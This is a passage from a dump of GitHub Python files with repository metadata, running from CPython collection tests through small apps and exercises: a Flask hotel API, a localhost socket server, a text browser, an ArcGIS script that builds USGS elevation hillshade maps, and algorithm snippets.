namedtuple('Point', ('x', 'y'))\n p = Point(x=11, y=22)\n self.assertEqual(repr(p), 'Point(x=11, y=22)')\n\n def test_tupleness(self):\n Point = namedtuple('Point', 'x y')\n p = Point(11, 22)\n\n self.assert_(isinstance(p, tuple))\n self.assertEqual(p, (11, 22)) # matches a real tuple\n self.assertEqual(tuple(p), (11, 22)) # coercable to a real tuple\n self.assertEqual(list(p), [11, 22]) # coercable to a list\n self.assertEqual(max(p), 22) # iterable\n self.assertEqual(max(*p), 22) # star-able\n x, y = p\n self.assertEqual(p, (x, y)) # unpacks like a tuple\n self.assertEqual((p[0], p[1]), (11, 22)) # indexable like a tuple\n self.assertRaises(IndexError, p.__getitem__, 3)\n\n self.assertEqual(p.x, x)\n self.assertEqual(p.y, y)\n self.assertRaises(AttributeError, eval, 'p.z', locals())\n\n def test_odd_sizes(self):\n Zero = namedtuple('Zero', '')\n self.assertEqual(Zero(), ())\n self.assertEqual(Zero._make([]), ())\n self.assertEqual(repr(Zero()), 'Zero()')\n self.assertEqual(Zero()._asdict(), {})\n self.assertEqual(Zero()._fields, ())\n\n Dot = namedtuple('Dot', 'd')\n self.assertEqual(Dot(1), (1,))\n self.assertEqual(Dot._make([1]), (1,))\n self.assertEqual(Dot(1).d, 1)\n self.assertEqual(repr(Dot(1)), 'Dot(d=1)')\n self.assertEqual(Dot(1)._asdict(), {'d':1})\n self.assertEqual(Dot(1)._replace(d=999), (999,))\n self.assertEqual(Dot(1)._fields, ('d',))\n\n n = 5000\n import string, random\n names = list(set(''.join([random.choice(string.ascii_letters)\n for j in range(10)]) for i in range(n)))\n n = len(names)\n Big = namedtuple('Big', names)\n b = Big(*range(n))\n self.assertEqual(b, tuple(range(n)))\n self.assertEqual(Big._make(range(n)), tuple(range(n)))\n for pos, name in enumerate(names):\n self.assertEqual(getattr(b, name), pos)\n repr(b) # make sure repr() doesn't blow-up\n d = b._asdict()\n d_expected = dict(zip(names, range(n)))\n self.assertEqual(d, d_expected)\n b2 = b._replace(**dict([(names[1], 999),(names[-5], 42)]))\n b2_expected = range(n)\n b2_expected[1] = 999\n b2_expected[-5] = 42\n self.assertEqual(b2, tuple(b2_expected))\n self.assertEqual(b._fields, tuple(names))\n\n def test_pickle(self):\n p = TestNT(x=10, y=20, z=30)\n for module in pickle, cPickle:\n loads = getattr(module, 'loads')\n dumps = getattr(module, 'dumps')\n for protocol in -1, 0, 1, 2:\n q = loads(dumps(p, protocol))\n self.assertEqual(p, q)\n self.assertEqual(p._fields, q._fields)\n\n def test_copy(self):\n p = TestNT(x=10, y=20, z=30)\n for copier in copy.copy, copy.deepcopy:\n q = copier(p)\n self.assertEqual(p, q)\n self.assertEqual(p._fields, q._fields)\n\nclass ABCTestCase(unittest.TestCase):\n\n def validate_abstract_methods(self, abc, *names):\n methodstubs = dict.fromkeys(names, lambda s, *args: 0)\n\n # everything should work will all required methods are present\n C = type('C', (abc,), methodstubs)\n C()\n\n # instantiation should fail if a required method is missing\n for name in names:\n stubs = methodstubs.copy()\n del stubs[name]\n C = type('C', (abc,), stubs)\n self.assertRaises(TypeError, C, name)\n\n\nclass TestOneTrickPonyABCs(ABCTestCase):\n\n def test_Hashable(self):\n # Check some non-hashables\n non_samples = [list(), set(), dict()]\n for x in non_samples:\n self.failIf(isinstance(x, Hashable), repr(x))\n self.failIf(issubclass(type(x), Hashable), repr(type(x)))\n # Check some hashables\n samples = [None,\n int(), float(), complex(),\n str(),\n tuple(), frozenset(),\n int, list, object, type,\n ]\n for x in samples:\n self.failUnless(isinstance(x, Hashable), repr(x))\n self.failUnless(issubclass(type(x), Hashable), repr(type(x)))\n self.assertRaises(TypeError, Hashable)\n # Check direct subclassing\n class H(Hashable):\n def __hash__(self):\n return super(H, self).__hash__()\n __eq__ = Hashable.__eq__ # Silence Py3k warning\n self.assertEqual(hash(H()), 0)\n self.failIf(issubclass(int, H))\n self.validate_abstract_methods(Hashable, '__hash__')\n\n def test_Iterable(self):\n # Check some non-iterables\n non_samples = [None, 42, 3.14, 1j]\n for x in non_samples:\n self.failIf(isinstance(x, Iterable), repr(x))\n self.failIf(issubclass(type(x), Iterable), repr(type(x)))\n # Check some iterables\n samples = [str(),\n tuple(), list(), set(), frozenset(), dict(),\n dict().keys(), dict().items(), dict().values(),\n (lambda: (yield))(),\n (x for x in []),\n ]\n for x in samples:\n self.failUnless(isinstance(x, Iterable), repr(x))\n self.failUnless(issubclass(type(x), Iterable), repr(type(x)))\n # Check direct subclassing\n class I(Iterable):\n def __iter__(self):\n return super(I, self).__iter__()\n self.assertEqual(list(I()), [])\n self.failIf(issubclass(str, I))\n self.validate_abstract_methods(Iterable, '__iter__')\n\n def test_Iterator(self):\n non_samples = [None, 42, 3.14, 1j, \"\".encode('ascii'), \"\", (), [],\n {}, set()]\n for x in non_samples:\n self.failIf(isinstance(x, Iterator), repr(x))\n self.failIf(issubclass(type(x), Iterator), repr(type(x)))\n samples = [iter(str()),\n iter(tuple()), iter(list()), iter(dict()),\n iter(set()), iter(frozenset()),\n iter(dict().keys()), iter(dict().items()),\n iter(dict().values()),\n (lambda: (yield))(),\n (x for x in []),\n ]\n for x in samples:\n self.failUnless(isinstance(x, Iterator), repr(x))\n self.failUnless(issubclass(type(x), Iterator), repr(type(x)))\n self.validate_abstract_methods(Iterator, 'next')\n\n def test_Sized(self):\n non_samples = [None, 42, 3.14, 1j,\n (lambda: (yield))(),\n (x for x in []),\n ]\n for x in non_samples:\n self.failIf(isinstance(x, Sized), repr(x))\n self.failIf(issubclass(type(x), Sized), repr(type(x)))\n samples = [str(),\n tuple(), list(), set(), frozenset(), dict(),\n dict().keys(), dict().items(), dict().values(),\n ]\n for x in samples:\n self.failUnless(isinstance(x, Sized), repr(x))\n self.failUnless(issubclass(type(x), Sized), repr(type(x)))\n self.validate_abstract_methods(Sized, '__len__')\n\n def test_Container(self):\n non_samples = [None, 42, 3.14, 1j,\n (lambda: (yield))(),\n (x for x in []),\n ]\n for x in non_samples:\n self.failIf(isinstance(x, Container), repr(x))\n self.failIf(issubclass(type(x), Container), repr(type(x)))\n samples = [str(),\n tuple(), list(), set(), frozenset(), dict(),\n dict().keys(), dict().items(),\n ]\n for x in samples:\n self.failUnless(isinstance(x, Container), repr(x))\n self.failUnless(issubclass(type(x), Container), repr(type(x)))\n self.validate_abstract_methods(Container, '__contains__')\n\n def test_Callable(self):\n non_samples = [None, 42, 3.14, 1j,\n \"\", \"\".encode('ascii'), (), [], {}, set(),\n (lambda: (yield))(),\n (x for x in []),\n ]\n for x in non_samples:\n self.failIf(isinstance(x, Callable), repr(x))\n self.failIf(issubclass(type(x), Callable), repr(type(x)))\n samples = [lambda: None,\n type, int, object,\n len,\n list.append, [].append,\n ]\n for x in samples:\n self.failUnless(isinstance(x, Callable), repr(x))\n self.failUnless(issubclass(type(x), Callable), repr(type(x)))\n self.validate_abstract_methods(Callable, '__call__')\n\n def test_direct_subclassing(self):\n for B in Hashable, Iterable, Iterator, Sized, Container, Callable:\n class C(B):\n pass\n self.failUnless(issubclass(C, B))\n self.failIf(issubclass(int, C))\n\n def test_registration(self):\n for B in Hashable, Iterable, Iterator, Sized, Container, Callable:\n class C:\n __metaclass__ = type\n __hash__ = None # Make sure it isn't hashable by default\n self.failIf(issubclass(C, B), B.__name__)\n B.register(C)\n self.failUnless(issubclass(C, B))\n\nclass WithSet(MutableSet):\n\n def __init__(self, it=()):\n self.data = set(it)\n\n def __len__(self):\n return len(self.data)\n\n def __iter__(self):\n return iter(self.data)\n\n def __contains__(self, item):\n return item in self.data\n\n def add(self, item):\n self.data.add(item)\n\n def discard(self, item):\n self.data.discard(item)\n\nclass TestCollectionABCs(ABCTestCase):\n\n # XXX For now, we only test some virtual inheritance properties.\n # We should also test the proper behavior of the collection ABCs\n # as real base classes or mix-in classes.\n\n def test_Set(self):\n for sample in [set, frozenset]:\n self.failUnless(isinstance(sample(), Set))\n self.failUnless(issubclass(sample, Set))\n self.validate_abstract_methods(Set, '__contains__', '__iter__', '__len__')\n\n def test_hash_Set(self):\n class OneTwoThreeSet(Set):\n def __init__(self):\n self.contents = [1, 2, 3]\n def __contains__(self, x):\n return x in self.contents\n def __len__(self):\n return len(self.contents)\n def __iter__(self):\n return iter(self.contents)\n def __hash__(self):\n return self._hash()\n a, b = OneTwoThreeSet(), OneTwoThreeSet()\n self.failUnless(hash(a) == hash(b))\n\n def test_MutableSet(self):\n self.failUnless(isinstance(set(), MutableSet))\n self.failUnless(issubclass(set, MutableSet))\n self.failIf(isinstance(frozenset(), MutableSet))\n self.failIf(issubclass(frozenset, MutableSet))\n self.validate_abstract_methods(MutableSet, '__contains__', '__iter__', '__len__',\n 'add', 'discard')\n\n def test_issue_5647(self):\n # MutableSet.__iand__ mutated the set during iteration\n s = WithSet('abcd')\n s &= WithSet('cdef') # This used to fail\n self.assertEqual(set(s), set('cd'))\n\n def test_issue_4920(self):\n # MutableSet.pop() method did not work\n class MySet(collections.MutableSet):\n __slots__=['__s']\n def __init__(self,items=None):\n if items is None:\n items=[]\n self.__s=set(items)\n def __contains__(self,v):\n return v in self.__s\n def __iter__(self):\n return iter(self.__s)\n def __len__(self):\n return len(self.__s)\n def add(self,v):\n result=v not in self.__s\n self.__s.add(v)\n return result\n def discard(self,v):\n result=v in self.__s\n self.__s.discard(v)\n return result\n def __repr__(self):\n return \"MySet(%s)\" % repr(list(self))\n s = MySet([5,43,2,1])\n self.assertEqual(s.pop(), 1)\n\n def test_Mapping(self):\n for sample in [dict]:\n self.failUnless(isinstance(sample(), Mapping))\n self.failUnless(issubclass(sample, Mapping))\n self.validate_abstract_methods(Mapping, '__contains__', '__iter__', '__len__',\n '__getitem__')\n\n def test_MutableMapping(self):\n for sample in [dict]:\n self.failUnless(isinstance(sample(), MutableMapping))\n self.failUnless(issubclass(sample, MutableMapping))\n self.validate_abstract_methods(MutableMapping, '__contains__', '__iter__', '__len__',\n '__getitem__', '__setitem__', '__delitem__')\n\n def test_Sequence(self):\n for sample in [tuple, list, str]:\n self.failUnless(isinstance(sample(), Sequence))\n self.failUnless(issubclass(sample, Sequence))\n self.failUnless(issubclass(basestring, Sequence))\n self.failUnless(isinstance(range(10), Sequence))\n self.failUnless(issubclass(xrange, Sequence))\n self.failUnless(issubclass(str, Sequence))\n self.validate_abstract_methods(Sequence, '__contains__', '__iter__', '__len__',\n '__getitem__')\n\n def test_MutableSequence(self):\n for sample in [tuple, str]:\n self.failIf(isinstance(sample(), MutableSequence))\n self.failIf(issubclass(sample, MutableSequence))\n for sample in [list]:\n self.failUnless(isinstance(sample(), MutableSequence))\n self.failUnless(issubclass(sample, MutableSequence))\n self.failIf(issubclass(basestring, MutableSequence))\n self.validate_abstract_methods(MutableSequence, '__contains__', '__iter__',\n '__len__', '__getitem__', '__setitem__', '__delitem__', 'insert')\n\nimport doctest, collections\n\ndef test_main(verbose=None):\n NamedTupleDocs = doctest.DocTestSuite(module=collections)\n test_classes = [TestNamedTuple, NamedTupleDocs, TestOneTrickPonyABCs, TestCollectionABCs]\n test_support.run_unittest(*test_classes)\n test_support.run_doctest(collections, verbose)\n\nif __name__ == \"__main__\":\n test_main(verbose=True)\n","repo_name":"damonkohler/sl4a","sub_path":"python/src/Lib/test/test_collections.py","file_name":"test_collections.py","file_ext":"py","file_size_in_byte":18805,"program_lang":"python","lang":"en","doc_type":"code","stars":2372,"dataset":"github-code","pt":"77"} +{"seq_id":"42715940365","text":"from flask import Flask, jsonify\nfrom flask_restful import Api\nfrom app.resources.v1.hotel import Hotels, Hotel\nfrom app.resources.v2.hotel import Hotels as hotels_v2, Hotel as hotel_v2\nfrom app.resources.v2.user import Users, User, Login, Logout, RefreshToken\nfrom flask_jwt_extended import JWTManager\nfrom blacklist import BLACKLIST\n\n\napp = Flask(__name__)\napp.config.from_object('config')\njwt = JWTManager(app)\napi = Api(app)\n\n# v1 resources\napi.add_resource(Hotels, '/v1/hotels/')\napi.add_resource(Hotel, '/v1/hotels/')\n\n# v2 resources\napi.add_resource(hotels_v2, '/v2/hotels/', endpoint='hotels_v2')\napi.add_resource(hotel_v2, '/v2/hotels/', endpoint='hotel_v2')\n\napi.add_resource(Users, '/v2/users/')\napi.add_resource(User, '/v2/users/', endpoint=\"user_id\")\napi.add_resource(Login, '/v2/login/')\napi.add_resource(Logout, '/v2/logout/')\napi.add_resource(RefreshToken, '/v2/refresh/')\n\n\n@app.before_first_request\ndef create_database():\n db.create_all()\n\n\n@jwt.token_in_blacklist_loader\ndef check_if_token_in_blacklist(token):\n return token['jti'] in BLACKLIST\n\n\n@jwt.revoked_token_loader\ndef token_access_invalid():\n return jsonify({'message': 'Token has been revoked'}), 401\n\n\n@app.route('/healthcheck/', methods=['GET'])\ndef healthcheck():\n return 'OK'\n\n\nif __name__ == '__main__':\n from database import db\n db.init_app(app)\n app.run(host='0.0.0.0')\n","repo_name":"brunoMirand/hotels_api","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"39832330303","text":"'''\nthis problem can be solved by two pointer approach----O(n)\n'''\ndef isalphanum(ch):\n if ord('A')<=ord(ch)<=ord('Z') or ord('a')<=ord(ch)<=ord('z') or ord('0')<=ord(ch)<=ord('9'):\n return True\n else:\n return False\n\ndef isPalindrome(s):\n i=0\n j=len(s)-1\n while i 0 :\n url = back_stack.pop()\n back_stack.append(back_puffer)\n path = os.path.join(dir_name, url.strip(\".com\").strip(\".org\").strip(\"www.\"))\n check_if_exists(path, url)\n try:\n text = get_page(url)\n with open(path, \"w\") as ufile:\n for tag in text:\n ufile.write(tag.get_text())\n back_puffer = url\n except KeyError:\n print(\"Error 404: URL not found\")\n continue\n\nbrowser()\n\n","repo_name":"arercon/Text-Based-Browser","sub_path":"browser.py","file_name":"browser.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7574017147","text":"import sys\r\nfrom heapq import heappush,heappop\r\ninput = sys.stdin.readline\r\n\r\nn = int(input())\r\n\r\nh = []\r\n# 길이가 n 짜리 힙\r\n# -5000 ~ 5000 까지넣을떄 언제 빼고 언제 넣어야해\r\n# 길이가 100짜리라면 제일 작은애보다 크다면 넣어야지\r\nfor _ in range(n):\r\n items = list(map(int,input().split()))\r\n for item in items :\r\n\r\n if (h and h[0] < item) or not h:\r\n heappush(h,item)\r\n #길이가 n 넘어가면 뺴\r\n if len(h) > n :\r\n heappop(h)\r\n\r\nprint(h[0])\r\n","repo_name":"wjs2063/BaekJoon","sub_path":"백준/Silver/2075. N번째 큰 수/N번째 큰 수.py","file_name":"N번째 큰 수.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"45299064034","text":"#unlike any other languages, python has no concept of private of protected variables\n#java would only have the functions play and cards available to users, the rest would be hidden\n\n#creatng a function with _function_name, i.e. an underscore in front, makes it a protected function\n#which can still be accessed when the corresponding filename is imported, but gives you a warning.\n#if object has _ in front of it, its a warning that it shouldnt b meddled with\n\n#prints out all the __functions__\n# g = sorted(globals())\n#\n# for x in globals():\n# print(x)\n\n##recursion\n\n# def fact(n):\n# \"\"\"calculate n iteratively\"\"\"\n# result = 1\n# if n > 1:\n# for f in range(2, n+1):\n# result *= f\n# return result\n\n\ndef factorial(n):\n # n can also be defined as n*(n-1)!\n\n if n <= 1:\n return 1\n else:\n return n * factorial(n-1)\n\ndef fib(n):\n \"\"\"f(n) = f(n-1) + f(n-2)\"\"\"\n if n < 2:\n return n\n else: return fib(n-1) + fib(n-2)\n\n\n\n\n#runs slowly with high fib numbers. so try iteratively\n\ndef fibonacci(n):\n if n ==0 :\n result = 0\n elif n ==1:\n result = 1\n else:\n n_minus1 = 1\n n_minus2 = 0\n for f in range(1, n):\n result = n_minus2 + n_minus1\n n_minus2 = n_minus1\n n_minus1 = result\n return result\n\nfor i in range(35):\n print(i, fibonacci(i))\n\n\n\n\n","repo_name":"micullen/learn","sub_path":"PythonCourse/ModulesFunctions/Import.py","file_name":"Import.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18276919253","text":"from socket import *\ns = socket()\ns.bind((\"localhost\", 9999))\ns.listen(3)\nwhile True:\n c, address = s.accept()\n print(\"Connected to \", address)\n c.send(bytes(\"Server welcomes you\", \"utf-8\"))\n\n c.close()\n","repo_name":"kn123g/Learnings","sub_path":"python/Socket_ServerClient/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39757050769","text":"\nclass StockSpanner:\n\n def __init__(self):\n self.array = []\n\n def next(self, price: int) -> int:\n stack = self.array\n span = 1\n quote = price\n while stack and stack[-1][0] <= quote:\n prevQuote,prevSpan = stack.pop()\n span += prevSpan\n self.array.append((quote,span))\n return span\n\n# We have to get the amount of days the newest quote has spanned\n# were a span is the consective days that the quote is less than or equal\n# to the current quote.\n# Each loop checks if the quote is bigger than the one ontop of the stack\n# This condenses the stack to store the numbers that bigger than the\n# previous entries and how many it has spanned.\n# If a smaller number gets added, it means the span has broke and it is added\n# to the top of the stack.\n# O(n), O(1) space\nS = StockSpanner()\nS.next(100)\nS.next(80)\nS.next(60)\nS.next(70)\nS.next(60)\nS.next(75)\nS.next(85)\n# output = [null,1,1,1,2,1,4,6]\n","repo_name":"patchangg/LeetCode","sub_path":"Python/Medium/901.py","file_name":"901.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"48117347496","text":"\"\"\"\nExample taken from http://matplotlib.org/1.5.0/examples/showcase/xkcd.html\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nwith plt.xkcd():\n # Based on \"The Data So Far\" from XKCD by Randall Monroe\n # http://xkcd.com/373/\n\n index = [0, 1]\n data = [0, 100]\n labels = ['CONFIRMED BY EXPERIMENT', 'REFUTED BY EXPERIMENT']\n\n fig = plt.figure()\n ax = fig.add_axes((0.1, 0.2, 0.8, 0.7))\n ax.bar(index, data, 0.25)\n ax.spines['right'].set_color('none')\n ax.spines['top'].set_color('none')\n ax.xaxis.set_ticks_position('bottom')\n ax.set_xticks([0, 1])\n ax.set_xlim([-0.5, 1.5])\n ax.set_ylim([0, 110])\n ax.set_xticklabels(labels)\n plt.yticks([])\n\n plt.title(\"CLAIMS OF SUPERNATURAL POWERS\")\n\n fig.text(\n 0.5, 0.05,\n '\"The Data So Far\" from xkcd by Randall Monroe',\n ha='center')\n\nplt.show()\n","repo_name":"apdavison/space-station-transylvania","sub_path":"xkcd.py","file_name":"xkcd.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28855102046","text":"import time\r\nimport os\r\nimport urllib.request\r\nimport visuals\r\nimport arcpy\r\nimport sys\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n#This script is used as an alterative to the \"USGS_DEM_Manipulation_App\", located in this same folder. Instead of choosing steps manually, this script automates all steps in the following order:\r\n# 1) Downloads MED Files(variable named \"regions\" below) from USGS \r\n# 2) Converts the TIF files into the specified geodatabase below (variable named \"gdb\")\r\n# 3) Creates a Hillshade file for each MED\r\n# 4) Creates two datasets for the mosiacs(one for the elevation data and one for the hillshade)\r\n# 5) Creates the two mosiacs using all specified regions below (one for elevation data and one for hillshade)\r\n# 6) Sets symbology properies for both layers to create a visually pleasing map showing two out three components for a 'Swiss Hillshade Map'\r\n\r\n\r\n#elevation layer color ramp style\r\nel_color = \"Elevation #1\"\r\n\r\n#hillshade layer color ramp style\r\nhill_color = \"Black to White\"\r\n\r\n#Project locaiton - end with front slash\r\np_root = \"Z:/ArcGIS_Modules/Automated_Map/\"\r\n\r\n#downloaded files locations\r\nf_root = \"Z:/ArcGIS_Modules/Automated_Map/files/\"\r\n\r\n#working GDB name\r\ngdb = \"Automated_Map\"\r\n\r\n#working regions - Must be in following format: 'nXXwXXX' Example 1: 'n21w089' - visit http://prd-tnm.s3.amazonaws.com/StagedProducts/Elevation/1/TIFF/ to see what regions you require.\r\n#regions = ['n29w082']\r\n\r\n#Florida\r\nregions = ['n25w081','n25w082','n25w083','n26w081','n26w082','n27w081','n27w082','n27w083','n28w081','n28w082','n28w083','n29w082','n29w081','n29w083','n30w081','n30w082','n30w083','n30w084','n30w085','n30w086','n31w082','n31w083','n31w084','n31w085','n31w086','n31w087','n31w088','n32w082','n32w083','n32w084','n32w085','n32w086','n32w087','n32w088']\r\n\r\n#active project\r\np = arcpy.mp.ArcGISProject(r\"Z:/ArcGIS_Modules/Automated_Map/Automated_Map.aprx\")\r\n\r\n#active map\r\nm = p.listMaps(\"Map\")[0]\r\n\r\n#active workspace\r\nenv = arcpy.env.workspace = p_root\r\n\r\n\r\n#downloads the files from the USGS website based on the regions specified.\r\ndef downloadFile(regions,p_root):\r\n\tvisuals.opt_bar(title=\"Starting to download files\",length=5,char=\".\",speed=1,clr_scn=0)\r\n\tfor region in regions:\r\n\t\turl = \"http://prd-tnm.s3.amazonaws.com/StagedProducts/Elevation/1/TIFF/\" + region + \"/USGS_1_\" + region + \".tif\"\r\n\t\tfile_name = p_root + \"data/USGS_1_\" + region + \".tif\"\r\n\t\ttry:\r\n\t\t\tprint(f\"{C.Y}starting to download \" + region + f\"{C.E}\")\r\n\t\t\trequest = urllib.request.urlretrieve(url, file_name)\r\n\t\t\tprint(str(request))\r\n\t\t\tprint(f\"{C.G}\" + region + f\" download complete!{C.E}\")\r\n\t\texcept NameError as e:\r\n\t\t\tprint(e)\r\n\t\t\tinput(f\"{C.R}There was an error downloading your file. Please try again.{C.E}\")\r\n\t\t\t\r\n\t\t\t\r\n\tprint(f\"\\n{C.G}Downloads completed!{C.E}\\n\")\r\n\r\n\r\n#adds the raster files to the geodatabase.\r\ndef addRaster2GDB(regions,gdb):\r\n\tvisuals.opt_bar(title=\"Starting to convert files to geodatabase\",length=5,char=\".\",speed=1,clr_scn=0)\r\n\tfor region in regions:\r\n\t\ttry:\r\n\t\t\tarcpy.RasterToGeodatabase_conversion(\"data/USGS_1_\" + region + \".tif\", gdb + \".gdb\", \"\")\r\n\t\t\tprint(f\"\\n{C.G}All rasters converted to geodatabase{C.E}\\n\")\r\n\t\texcept NameError as e:\r\n\t\t\tprint(e)\r\n\t\t\tinput(f\"{C.R}There was an error converting files to geodatabase.{C.E}\")\r\n\t\t\tsys.exit()\r\n\r\n\r\n\r\n#Creates new datasets to house the mosaic data.\r\ndef createDataset(regions,p_root,p,gdb,mp):\r\n\tvisuals.opt_bar(title=\"Starting to create datasets\",length=5,char=\".\",speed=1,clr_scn=0)\r\n\tstr_EL_regions = \"\"\r\n\tstr_HS_regions = \"\"\r\n\ttry:\r\n\t\tarcpy.management.CreateRasterDataset(p_root + gdb + \".gdb\",\"Auto_El_Dataset\")\r\n\t\tarcpy.management.CreateRasterDataset(p_root + gdb + \".gdb\",\"Auto_Hill_Dataset\")\r\n\t\tmp.addDataFromPath(str(p_root + gdb + \".gdb/Auto_Hill_Dataset\"))\r\n\t\tmp.addDataFromPath(str(p_root + gdb + \".gdb/Auto_El_Dataset\"))\r\n\t\tp.save()\r\n\t\tprint(f\"\\n{C.G}Datasets have been created.{C.E}\\n\")\r\n\texcept NameError as e:\r\n\t\tprint(e)\r\n\t\tinput(f\"{C.R}There was an error creating datasets.{C.E}\")\r\n\t\tsys.exit()\r\n\t\r\n\t\r\n\tvisuals.opt_bar(title=\"Starting to create mosaic datasets\",length=5,char=\".\",speed=1,clr_scn=0)\r\n\ttry:\r\n\t\tstr_EL_regions = pushRegionsToStrings(regions,\"USGS_1_\",gdb)\r\n\t\tstr_HS_regions = pushRegionsToStrings(regions,\"HS_\",gdb)\r\n\t\tarcpy.management.Mosaic(str_HS_regions,gdb + \".gdb/Auto_Hill_Dataset\")\r\n\t\tarcpy.management.Mosaic(str_EL_regions,gdb + \".gdb/Auto_El_Dataset\")\r\n\t\tp.save()\r\n\t\tprint(f\"\\n{C.G}Mosaics have been created.{C.E}\\n\")\r\n\texcept NameError as e:\r\n\t\tprint(e)\r\n\t\tinput(f\"{C.R}There was an error creating mosaics.{C.E}\")\r\n\t\tsys.exit()\r\n\t\r\n\r\ndef addFocalStats(p_root,gdb):\r\n\tvisuals.opt_bar(title=\"Starting to add Focal Statistics\",length=5,char=\".\",speed=1,clr_scn=0)\r\n\ttry:\r\n\t\tarcpy.sa.FocalStatistics(p_root + gdb + \".gdb/Auto_El_Dataset\")\r\n\t\tarcpy.sa.FocalStatistics(p_root + gdb + \".gdb/Auto_Hill_Dataset\")\r\n\t\tp.save()\r\n\t\tprint(f\"\\n{C.G}Focal Stats has been added.{C.E}\\n\")\r\n\texcept NameError as e:\r\n\t\tprint(e)\r\n\t\tinput(f\"{C.R}There was an error creating applying Focal Stats.{C.E}\")\r\n\t\tsys.exit()\r\n\r\n\r\n#Takes the region list and formats it for use in the Mosaic toolset\r\ndef pushRegionsToStrings(regions,var,gdb):\r\n\tstr_regions = \"\"\r\n\tfor region in regions:\r\n\t\tstr_regions += gdb + \".gdb/\" + var + region + \";\"\r\n\tstr_regions = str_regions.rstrip(str_regions[-1])\r\n\treturn str_regions\r\n\r\n\r\n#sets the symbology for the layers.\r\ndef addSymbologyToMap(mp,regions,p,p_root,gdb):\r\n\tvisuals.opt_bar(title=\"Starting to apply symbology to elevation dataset\",length=5,char=\".\",speed=1,clr_scn=0)\r\n\tcr = p.listColorRamps(el_color)[0]\r\n\tcr_h = p.listColorRamps(hill_color)[0]\r\n\r\n\t#Sets the elevation layer symbology\r\n\ttry:\r\n\t\tl = mp.listLayers(\"Auto_El_Dataset\")[0]\r\n\t\tsym = l.symbology\r\n\t\tsym.updateColorizer(\"RasterStretchColorizer\")\r\n\t\tsym.colorizer.colorRamp = cr\r\n\t\tsym.colorizer.classificationMethod = \"Naturalsys.exit()s\"\r\n\t\tsym.colorizer.breakCount = 18\r\n\t\tl.symbology = sym\r\n\t\tl.transparency = 40\r\n\t\tp.save()\r\n\t\tprint(f\"\\n{C.G}Elevation data symbology added successfully.{C.E}\\n\")\r\n\texcept NameError as e:\r\n\t\tprint(e)\r\n\t\tinput(f\"{C.R}There was an error applying symbology to elevation layers{C.E}\")\r\n\t\r\n\t\r\n\t#Sets the hillside symbology\r\n\tvisuals.opt_bar(title=\"Starting to apply symbology to hillshade dataset\",length=5,char=\".\",speed=1,clr_scn=0)\r\n\ttry:\r\n\t\tl = mp.listLayers(\"Auto_Hill_Dataset\")[0]\r\n\t\tsym = l.symbology\r\n\t\tsym.updateColorizer(\"RasterStretchColorizer\")\r\n\t\tsym.colorizer.colorRamp = cr_h\r\n\t\tl.symbology = sym\r\n\t\tp.save()\r\n\t\tprint(f\"\\n{C.G}Hillside data symbology added successfully.{C.E}\\n\")\r\n\texcept NameError as e:\r\n\t\tprint(e)\r\n\t\tprint(f\"{C.R}There was an error applying symbology to hillshade layer.{C.E}\")\r\n\t\r\n\r\n#creates hillshade files out of the tif's and then coverts them into the geodatabase.\r\ndef layerToHillshade(regions,p_root,gdb,mp,p):\r\n\tvisuals.opt_bar(title=\"Starting to create hillshade files\",length=5,char=\".\",speed=1,clr_scn=0)\r\n\tfor region in regions:\r\n\t\ttry:\r\n\t\t\toutHillshade = arcpy.sa.Hillshade(p_root + gdb + \".gdb/USGS_1_\" + region)\r\n\t\t\toutHillshade.save(p_root + \"output/HS_\" + region)\r\n\t\t\tarcpy.RasterToGeodatabase_conversion(\"output/HS_\" + region,gdb + \".gdb\", \"\")\r\n\t\t\tprint(f\"\\n{C.G}Hillshades created successfully.{C.E}\")\r\n\t\texcept NameError as e:\r\n\t\t\tprint(e)\r\n\t\t\tinput(f\"{C.R}There was an error creating hillshade files.{C.E}\")\r\n\t\t\tsys.exit()\r\n\t\r\n\r\ndef goodbye():\r\n\tinput(\"All modules have ran successfully, press any key to close.\")\r\n\r\n\r\n#color class for visual purposes.\r\nclass C:\r\n H = '\\033[95m'\r\n B = '\\033[94m'\r\n C = '\\033[96m'\r\n G = '\\033[92m'\r\n Y = '\\033[93m'\r\n R = '\\033[91m'\r\n E = '\\033[0m'\r\n BOLD = '\\033[1m'\r\n UNDERLINE = '\\033[4m'\r\n\r\n\r\n#Run the script:\r\n\r\n#Download the files from USGS.\r\ndownloadFile(regions,p_root)\r\n\r\n#Add downloaded DEM files to a gdb\r\naddRaster2GDB(regions,gdb)\r\n\r\n#Create Hillshade files out of the DEM files from gdb\r\nlayerToHillshade(regions,p_root,gdb,p,m)\r\n\r\n#Create the datasets to join files together and turn all tiles into a mosaic\r\ncreateDataset(regions,p_root,p,gdb,m)\r\n\r\n#smooths out the cells in the elevation data since maps from USGS can be a bit choppy\r\naddFocalStats(p_root,gdb)\r\n\r\n#Add the symbology to the dataset layers\r\naddSymbologyToMap(m,regions,p,p_root,gdb)\r\n\r\n#closes program\r\ngoodbye()\r\n","repo_name":"ScriptChicken/USGS_Automation_Script","sub_path":"USGS_to_Swiss_Hillshade_Script.py","file_name":"USGS_to_Swiss_Hillshade_Script.py","file_ext":"py","file_size_in_byte":8299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33551279901","text":"\nclass Node:\n def __init__(self, dataval=None):\n self.dataval = dataval\n self.nextval = self\n self.prevval = self\n\nclass LinkedList:\n \n def 